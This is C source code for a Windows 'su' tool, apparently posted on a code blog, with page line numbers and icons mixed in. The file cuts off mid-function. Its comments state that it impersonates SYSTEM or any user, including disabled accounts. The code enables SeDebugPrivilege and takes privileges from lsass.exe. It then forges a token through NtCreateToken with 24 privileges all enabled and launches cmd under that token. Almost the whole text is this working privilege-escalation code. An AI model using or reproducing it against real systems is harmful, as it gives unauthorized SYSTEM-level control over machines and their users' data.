![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
1![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* su切换用户
2
* 2004/12/28 1.0,发现Bingle的wsu是假冒令牌,权限并没有真正设置.
3
* 2004/12/29 2.0,真正实现模拟用户令牌的动作.
4
* 2004/12/29 3.0,即使帐号禁止也可以模拟用户
5
* 2004/12/30 4.0, 可以模拟SYSTEM用户,权限24个,全部默认开放
6
* 2004/12/30 4.1 终端登陆用户可以获取管理员组/SYSTEM权限.普通用户失败.
7
*/
8
#include <stdio.h>
9
#include <stdlib.h>
10
#include <winsock2.h>
11
#include <lm.h>
12
#include <Ntsecapi.h>
13
#include <Accctrl.h>
14
#include <Aclapi.h>
15
#include <Tlhelp32.h>
16
#include <windows.h>
17![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
18![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
19
#pragma comment(lib,"ws2_32")
20
#pragma comment(lib,"Advapi32")
21
#pragma comment(lib,"User32")
22
#pragma comment(lib,"Netapi32")
23![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
24
#define SIZE 1024
25
#define VERSION "4.1"
26![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
27
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
28
#define WINSTA_ALL (WINSTA_ACCESSCLIPBOARD|WINSTA_ACCESSGLOBALATOMS|WINSTA_CREATEDESKTOP| WINSTA_ENUMDESKTOPS|WINSTA_ENUMERATE|WINSTA_EXITWINDOWS|WINSTA_READATTRIBUTES | WINSTA_READSCREEN|WINSTA_WRITEATTRIBUTES|DELETE|READ_CONTROL| WRITE_DAC|WRITE_OWNER)
29
#define DESKTOP_ALL (DESKTOP_CREATEMENU|DESKTOP_CREATEWINDOW|DESKTOP_ENUMERATE|DESKTOP_HOOKCONTROL|DESKTOP_JOURNALPLAYBACK|DESKTOP_JOURNALRECORD|DESKTOP_READOBJECTS | DESKTOP_SWITCHDESKTOP|DESKTOP_WRITEOBJECTS|DELETE|READ_CONTROL| WRITE_DAC|WRITE_OWNER)
30
#define GENERIC_ACCESS (GENERIC_READ|GENERIC_WRITE|GENERIC_EXECUTE|GENERIC_ALL)
31
#define SE_GROUP_RESOURCE (0x20000000L)
32![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
33
typedef struct _OBJECT_ATTRIBUTES
34![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
35
ULONG Length;
36
HANDLE RootDirectory;
37
PUNICODE_STRING ObjectName;
38
ULONG Attributes;
39
PVOID SecurityDescriptor;
40
PVOID SecurityQualityOfService;
41
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
42![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
43![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
typedef enum _LSA_TOKEN_INFORMATION_TYPE
{
44
LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
45
LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
46
LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
47
} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
48![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
49
typedef struct _LSA_TOKEN_INFORMATION_NULL
50![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
51
LARGE_INTEGER ExpirationTime;
52
PTOKEN_GROUPS Groups;
53
} LSA_TOKEN_INFORMATION_NULL, *PLSA_TOKEN_INFORMATION_NULL;
54![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
55
typedef NTSTATUS (*PNtCreateToken)(
56
PHANDLE TokenHandle,
57
ACCESS_MASK DesiredAccess,
58
POBJECT_ATTRIBUTES ObjectAttributes,
59
TOKEN_TYPE TokenType,
60
PLUID AuthenticationId,
61
PLARGE_INTEGER ExpirationTime,
62
PTOKEN_USER TokenUser,
63
PTOKEN_GROUPS TokenGroups,
64
PTOKEN_PRIVILEGES TokenPrivileges,
65
PTOKEN_OWNER TokenOwner,
66
PTOKEN_PRIMARY_GROUP TokenPrimaryGroup,
67
PTOKEN_DEFAULT_DACL TokenDefaultDacl,
68
PTOKEN_SOURCE TokenSource
69
);
70![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
71![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
72![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
typedef struct _PROFILEINFO
{
73
DWORD dwSize;
74
DWORD dwFlags;
75
LPTSTR lpUserName;
76
LPTSTR lpProfilePath;
77
LPTSTR lpDefaultPath;
78
LPTSTR lpServerName;
79
LPTSTR lpPolicyPath;
80
HANDLE hProfile;
81
} PROFILEINFO, *LPPROFILEINFO;
82![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
83
typedef BOOL (*PLoadUserProfile)(
84
HANDLE hToken, // user token
85
LPPROFILEINFO lpProfileInfo // profile
86
);
87![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
88![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
89
typedef BOOL (*PUnloadUserProfile)(
90
HANDLE hToken, // user token
91
HANDLE hProfile // handle to registry key
92
);
93
BOOL cback = 0;
94
char *system_user = NULL;
95
int lsasspid = 0;
96
unsigned int DebugLevel = 7;
97![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
98![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* 函数定义开始 */
99
void usage(char *s);
100
int GrantPriv();
101
HANDLE CreateTokenAsUser(char *user);
102
BOOL ConvertSidToStringSid(PSID pSid,LPTSTR TextualSid, LPDWORD lpdwBufferLen);
103
BOOL GetUserGroup(char *username,char ***name,int *groupcount);
104
PSID GetUserSid(char *LookupUser);
105
HANDLE NtCreateTokenAsuser(char *user);
106
int GrantPrivFromLsass(int pid);
107
void *GetFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS tic);
108
void pfree(void *p);
109
LUID GetLuidFromText(char *s);
110
TOKEN_PRIVILEGES *MakeAdminPriv();
111
BOOL AddUserPrivToHandle(HANDLE Hhandle,char *s,ACCESS_MODE mode);
112![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
113![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
/**//* 函数定义结束 */
114
int main(int argc,char **argv)
115![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
116
int i;
117
WSADATA wsd;
118
HANDLE NewToken;
119
PLoadUserProfile LoadUserProfile;
120
PUnloadUserProfile UnloadUserProfile;
121
HMODULE UserenvModule;
122![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
123
printf( "su.exe like unix su tool,version %s \n"
124
"by bkbll (bkbll#cnhonker.net) http://www.cnhonker.com\n\n",VERSION);
125![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
126
if((argc>1) && (strnicmp(argv[1],"-h",2) == 0))
127![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
128
usage(argv[0]);
129
return -1;
130
}
131
for(i=1;i<argc;i+=2)
132![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
133
if(strlen(argv[i]) != 2)
134![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
135
usage(argv[0]);
136
return -1;
137
}
138
switch(argv[i][1])
139![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
140
case 'u':
141
system_user = argv[i+1];
142
break;
143
case 'D':
144
DebugLevel = atoi(argv[i+1]);
145
break;
146![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
147
}
148
}
149
if(system_user == NULL)
150![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
151
usage(argv[0]);
152
return -1;
153
}
154
UserenvModule = LoadLibrary("Userenv.dll");
155
if(UserenvModule == NULL )
156![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
157
printf("[-] GetModuleHandle Userenv error:%d\n",GetLastError());
158
return -1;
159
}
160
LoadUserProfile = (PLoadUserProfile) GetProcAddress(UserenvModule,"LoadUserProfileA");
161
if(LoadUserProfile == NULL)
162![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
163
printf("[-] GetProcAddress LoadUserProfile error:%d\n",GetLastError());
164
return -1;
165
}
166![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
167
UnloadUserProfile = (PUnloadUserProfile) GetProcAddress(UserenvModule,"UnloadUserProfile");
168
if(UnloadUserProfile == NULL)
169![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
170
printf("[-] GetProcAddress UnloadUserProfile error:%d\n",GetLastError());
171
return -1;
172
}
173![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
174
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
175![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
176
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
177
return -1;
178
}
179
//首先建立一个TOKEN,这里假设是ADMIN用户
180
//提升自己权限,先.
181
printf("[+] Enable SeDebugPrivilege..\n");
182
if(GrantPriv("SeDebugPrivilege") < 0)
183
return -1;
184
printf("[+] Get Lsass.exe Pid
.");
185
fflush(NULL);
186
lsasspid = GetPidOfProcess("lsass.exe");
187
if(lsasspid == -1)
188![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
189
printf("Get Pid of services failed\n");
190
return -1;
191
}
192
printf("%d\n",lsasspid);
193
//从Lsass继承权限.
194
printf("[+] GrantPrivilege From Lsass
.\n");
195
if(GrantPrivFromLsass(lsasspid) == 0)
196![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
197
//建立一个TOKEN
198
//NewToken = CreateTokenAsUser(system_user);
199
printf("[+] Calling NtCreateTokenAsuser
\n");
200
NewToken = NtCreateTokenAsuser(system_user);
201
if(NewToken != INVALID_HANDLE_VALUE)
202![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
203
STARTUPINFO si;
204
PROCESS_INFORMATION pi;
205
PROFILEINFO ProfileInfo;
206![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
207![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
208
printf("[+] CreateProcess By that Token
\n");
209
fflush(stdout);
210
Sleep(1000);
211
LoadUserProfile(NewToken,&ProfileInfo);
212![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
213
ZeroMemory( &si, sizeof(si) );
214
si.cb = sizeof(si);
215
//si.lpDesktop = TEXT("winstaABC\\testdesktop");
216
ZeroMemory( &pi, sizeof(pi) );
217
if( !CreateProcessAsUser( NewToken,
218
NULL, // No module name (use command line).
219
"cmd", // Command line.
220
NULL, // Process handle not inheritable.
221
NULL, // Thread handle not inheritable.
222
TRUE, // Set handle inheritance to FALSE.
223
0, // No creation flags.
224
NULL, // Use parent's environment block.
225
NULL, // Use parent's starting directory.
226
&si, // Pointer to STARTUPINFO structure.
227
&pi ) // Pointer to PROCESS_INFORMATION structure.
228
)
229![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
230
printf( "CreateProcessAsuser failed:%d.",GetLastError());
231
exit(0);
232
}
233![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
234
// Wait until child process exits.
235
WaitForSingleObject( pi.hProcess, INFINITE );
236
// Close process and thread handles.
237
CloseHandle( pi.hProcess );
238
CloseHandle( pi.hThread );
239
printf("[-] Process exited.\n");
240
UnloadUserProfile(NewToken,ProfileInfo.hProfile);
241
CloseHandle(NewToken);
242
//用这个Token建立进程
243
}
244
}
245
WSACleanup();
246
exit(0);
247
}
248
//获得指定exe的PID
249
int GetPidOfProcess(char *exe)
250![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
251
HANDLE hProcessSnap = NULL;
252
BOOL bRet = FALSE;
253
PROCESSENTRY32 pe32;
254
int pid;
255![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
256
memset(&pe32,0,sizeof(PROCESSENTRY32));
257
pid = -1;
258
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
259
if (hProcessSnap == INVALID_HANDLE_VALUE)
260![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
261
printf("CreateToolhelp32Snapshot Failed:%d\n",GetLastError());
262
return pid;
263
}
264
//copy from MSDN
265
pe32.dwSize = sizeof(PROCESSENTRY32);
266
if (Process32First(hProcessSnap, &pe32))
267![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
268
do
269![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
270
if(stricmp(pe32.szExeFile,exe) == 0)
271![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
272
pid = pe32.th32ProcessID;
273
break;
274
}
275
//printf( "PID:%d\n", pe32.th32ProcessID);
276
//printf( "exepath:%s\n", pe32.szExeFile);
277
} while(Process32Next(hProcessSnap, &pe32));
278
}
279
else
280
return pid;
281
// Do not forget to clean up the snapshot object.
282
CloseHandle(hProcessSnap);
283
return pid;
284
}
285
//返回指定用户/组的SID
286
PSID GetUserSid(char *LookupUser)
287![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
288
SID *GroupSid;
289
//char StringSid[SIZE];
290
//DWORD SidSize,GroupCount;
291
char *DomainName;
292
//**UserGroup,*CurrentUser;
293
DWORD cbSid,cbDomainName;
294
SID_NAME_USE peUse;
295
int ErrorCode,i;
296![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
297
cbDomainName = 0;
298
cbSid = 0;
299
LookupAccountName(NULL,LookupUser,NULL,&cbSid,NULL,&cbDomainName,&peUse);
300
ErrorCode = GetLastError();
301
if(ErrorCode == ERROR_INSUFFICIENT_BUFFER) //122
302![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
303
//printf("Buffer is small. require cbSid %d bytes,cbDomainName %d bytes\n",cbSid,cbDomainName);
304
GroupSid = (SID *) malloc(cbSid + 1);
305
DomainName = (char*) malloc(cbDomainName + 1);
306
if((GroupSid == NULL) || (DomainName == NULL))
307![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
308
printf("Malloc failed:%d\n",GetLastError());
309
return NULL;
310
}
311
memset(GroupSid,0,cbSid + 1);
312
memset(DomainName,0,cbDomainName + 1);
313
}
314
else
315![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
316
printf("LookupAccountName in GetUserSid(\"%s\") Failed:%d\n",LookupUser,ErrorCode);
317
return NULL;
318
}
319
if(!LookupAccountName(NULL,LookupUser,GroupSid,&cbSid,DomainName,&cbDomainName,&peUse))
320![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
321
printf("LookupAccountName GetUserSid(\"%s\") After Malloc Failed:%d\n",LookupUser,GetLastError());
322
return NULL;
323
}
324
pfree(DomainName);
325
return GroupSid;
326
}
327![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
328
//建立Administrators和SYSTEM 共用的privilege
329
TOKEN_PRIVILEGES *MakeAdminPriv()
330![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
331
TOKEN_PRIVILEGES *token_privileges;
332
DWORD i,PrivilegeCount;
333![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
334
i = 0;
335
PrivilegeCount = 24;
336
token_privileges = (PTOKEN_PRIVILEGES) malloc(4 + (3*4)*PrivilegeCount + 4);
337
if(token_privileges == NULL)
338![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
339
printf("malloc failed for PTOKEN_PRIVILEGES in NtCreateTokenAsuser\n");
340
return NULL;
341
}
342
token_privileges->PrivilegeCount = PrivilegeCount;
343
//0
344
token_privileges->Privileges[i].Attributes = 3;
345
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeTcbPrivilege");
346
//1
347
token_privileges->Privileges[i].Attributes = 3;
348
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreateTokenPrivilege");
349
//2
350
token_privileges->Privileges[i].Attributes = 3;
351
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeTakeOwnershipPrivilege");
352
//3
353
token_privileges->Privileges[i].Attributes = 3;
354
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreatePagefilePrivilege");
355
//4
356
token_privileges->Privileges[i].Attributes = 3;
357
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeLockMemoryPrivilege");
358
//5
359
token_privileges->Privileges[i].Attributes = 3;
360
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeAssignPrimaryTokenPrivilege");
361
//6
362
token_privileges->Privileges[i].Attributes = 3;
363
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeIncreaseQuotaPrivilege");
364
//7
365
token_privileges->Privileges[i].Attributes = 3;
366
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeIncreaseBasePriorityPrivilege");
367
//8
368
token_privileges->Privileges[i].Attributes = 3;
369
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreatePermanentPrivilege");
370
//9
371
token_privileges->Privileges[i].Attributes = 3;
372
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeDebugPrivilege");
373
//10
374
token_privileges->Privileges[i].Attributes = 3;
375
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeAuditPrivilege");
376
//11
377
token_privileges->Privileges[i].Attributes = 3;
378
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSecurityPrivilege");
379
//12
380
token_privileges->Privileges[i].Attributes = 3;
381
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSystemEnvironmentPrivilege");
382
//13
383
token_privileges->Privileges[i].Attributes = 3;
384
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeChangeNotifyPrivilege");
385
//14
386
token_privileges->Privileges[i].Attributes = 3;
387
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeBackupPrivilege");
388
//15
389
token_privileges->Privileges[i].Attributes = 3;
390
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeRestorePrivilege");
391
//16
392
token_privileges->Privileges[i].Attributes = 3;
393
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeShutdownPrivilege");
394
//17
395
token_privileges->Privileges[i].Attributes = 3;
396
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeLoadDriverPrivilege");
397
//18
398
token_privileges->Privileges[i].Attributes = 3;
399
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeProfileSingleProcessPrivilege");
400
//19
401
token_privileges->Privileges[i].Attributes = 3;
402
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeSystemtimePrivilege");
403
//20
404
token_privileges->Privileges[i].Attributes = 3;
405
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeUndockPrivilege");
406
//21
407
token_privileges->Privileges[i].Attributes = 3;
408
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeManageVolumePrivilege");
409
//22
410
token_privileges->Privileges[i].Attributes = 3;
411
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeImpersonatePrivilege");
412
//23
413
token_privileges->Privileges[i].Attributes = 3;
414
token_privileges->Privileges[i++].Luid = GetLuidFromText("SeCreateGlobalPrivilege");
415![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
416
return token_privileges;
417![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
418
}
419
//加用户到HANDLE
420
BOOL AddUserPrivToHandle(HANDLE Hhandle,char *s,ACCESS_MODE mode)
421![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
422
PSECURITY_DESCRIPTOR pSecurityDescriptor1,pSD = NULL;
423
DWORD size,size1,len,ErrorCode,DaclPresent,DaclDefaulted,dwAbsoluteSDSize,dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize;
424
ACL OldAcl;
425
PACL POldAcl,PNewAcl,pDacl,pSacl;
426
PSID pOwner,pPrimaryGroup;
427
EXPLICIT_ACCESS ExplicitAccess1;
428
SECURITY_INFORMATION sinfo;
429![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
430
dwAbsoluteSDSize = dwDaclSize = dwSaclSize = dwOwnerSize = dwPrimaryGroupSize = 0;
431![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
432
size = 0;
433
sinfo = DACL_SECURITY_INFORMATION;
434
//获得SECURITY_DESCRIPTOR
435
GetUserObjectSecurity(Hhandle,&sinfo,pSD,size,&len);
436
ErrorCode = GetLastError();
437
if(ErrorCode == ERROR_INSUFFICIENT_BUFFER) //122
438![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
439
pSD = (PSECURITY_DESCRIPTOR) malloc(len + 1);
440
if(pSD == NULL)
441![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
442
printf("Malloc failed:%d\n",GetLastError());
443
return FALSE;
444
}
445
memset(pSD,0,len + 1);
446
size = len;
447
}
448
else
449![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
450
printf("GetUserObjectSecurity in AddUserPrivToHandle(\"%s\") Failed:%d\n",s,ErrorCode);
451
return FALSE;
452
}
453
if(!GetUserObjectSecurity(Hhandle,&sinfo,pSD,size,&len))
454![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
455
printf("GetUserObjectSecurity in AddUserPrivToHandle(\"%s\") Failed:%d\n",s,ErrorCode);
456
return FALSE;
457
}
458
//获得DACL
459
POldAcl = NULL;
460
if(!GetSecurityDescriptorDacl(pSD,&DaclPresent,&POldAcl,&DaclDefaulted))
461![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
462
printf("GetSecurityDescriptorDacl Error:%d\n",GetLastError());
463
return FALSE;
464
}
465
//重新生成一个ACL,然后在后面合并进去,给administrators组全部的权限.
466
memset(&ExplicitAccess1,0,sizeof(ExplicitAccess1));
467
BuildExplicitAccessWithName(&ExplicitAccess1,s,mode,GRANT_ACCESS,NO_INHERITANCE);
468
//合并权限
469
ErrorCode = SetEntriesInAcl(1,&ExplicitAccess1,POldAcl,&PNewAcl);
470
if(ErrorCode != ERROR_SUCCESS)
471![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
472
printf("SetEntriesInAcl Error:%d\n",ErrorCode);
473
return FALSE;
474
}
475![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
476
dwAbsoluteSDSize = 0x400;
477
pSecurityDescriptor1 = (PSECURITY_DESCRIPTOR) malloc(dwAbsoluteSDSize+1);
478
if(pSecurityDescriptor1 == NULL)
479![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
480
printf("Malloc for MakeAbsoluteSD failed:%d\n",GetLastError());
481
return FALSE;
482
}
483
memset(pSecurityDescriptor1,0,dwAbsoluteSDSize+1);
484![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
485
MakeAbsoluteSD( pSD,
486
pSecurityDescriptor1,
487
&dwAbsoluteSDSize,
488
NULL,
489
&dwDaclSize,
490
NULL,
491
&dwSaclSize,
492
NULL,
493
&dwOwnerSize,
494
NULL,
495
&dwPrimaryGroupSize);
496
//申请内存先.
497
ErrorCode = GetLastError();
498![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
499
if(ErrorCode == ERROR_INSUFFICIENT_BUFFER)
500![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
501
//申请内存
502
//printf("申请内存大小:\ndwDaclSize=%d\ndwSaclSize=%d\ndwOwnerSize=%d\ndwPrimaryGroupSize=%d\ndwAbsoluteSDSize=%d\n",
503
// dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize,dwAbsoluteSDSize);
504
//
505
//pSecurityDescriptor1 = (PSECURITY_DESCRIPTOR) malloc(dwAbsoluteSDSize+1);
506
pDacl = (PACL) malloc(dwDaclSize+1);
507
pSacl = (PACL) malloc(dwSaclSize+1);
508
pOwner = (PSID) malloc(dwOwnerSize+1);
509
pPrimaryGroup = (PSID) malloc(dwPrimaryGroupSize+1);
510![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
511
if( //(pSecurityDescriptor1 == NULL) ||
512
(pDacl == NULL) ||
513
(pSacl == NULL) ||
514
(pOwner == NULL) ||
515
(pPrimaryGroup == NULL))
516![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
517
printf("Malloc for MakeAbsoluteSD failed:%d\n",GetLastError());
518
return FALSE;
519
}
520
//memset(pSecurityDescriptor1,0,dwAbsoluteSDSize+1);
521
}
522
else
523![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
524
printf("MakeAbsoluteSD Error:%d\n",GetLastError());
525
return FALSE;
526
}
527
//申请后就可以接受了
528
if(!MakeAbsoluteSD(pSD,
529
pSecurityDescriptor1,
530
&dwAbsoluteSDSize,
531
pDacl,
532
&dwDaclSize,
533
pSacl,
534
&dwSaclSize,
535
pOwner,
536
&dwOwnerSize,
537
pPrimaryGroup,
538
&dwPrimaryGroupSize))
539![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
540
printf("MakeAbsoluteSD After Malloc Error:%d\n",GetLastError());
541
return FALSE;
542
}
543
//printf("实际接受大小:\ndwDaclSize=%d\ndwSaclSize=%d\ndwOwnerSize=%d\ndwPrimaryGroupSize=%d\ndwAbsoluteSDSize=%d\n",
544
// dwDaclSize,dwSaclSize,dwOwnerSize,dwPrimaryGroupSize,size1);
545
//设置新的DACL
546
if(!SetSecurityDescriptorDacl(pSecurityDescriptor1,DaclPresent,PNewAcl,DaclDefaulted))
547![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
548
printf("SetSecurityDescriptorDacl Error:%d\n",GetLastError());
549
return FALSE;
550
}
551
//检查新的SecurityDescriptor是否合法
552
if(!IsValidSecurityDescriptor(pSecurityDescriptor1))
